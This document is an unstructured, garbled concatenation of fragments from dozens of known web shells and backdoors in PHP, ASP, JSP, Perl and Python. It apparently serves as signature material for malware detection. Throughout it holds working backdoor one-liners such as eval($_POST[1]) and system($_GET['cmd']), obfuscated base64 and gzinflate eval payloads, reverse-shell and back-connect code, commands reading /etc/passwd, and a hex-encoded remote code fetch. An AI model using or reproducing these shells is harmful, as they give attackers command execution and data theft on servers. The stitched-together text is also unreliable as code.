\"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" 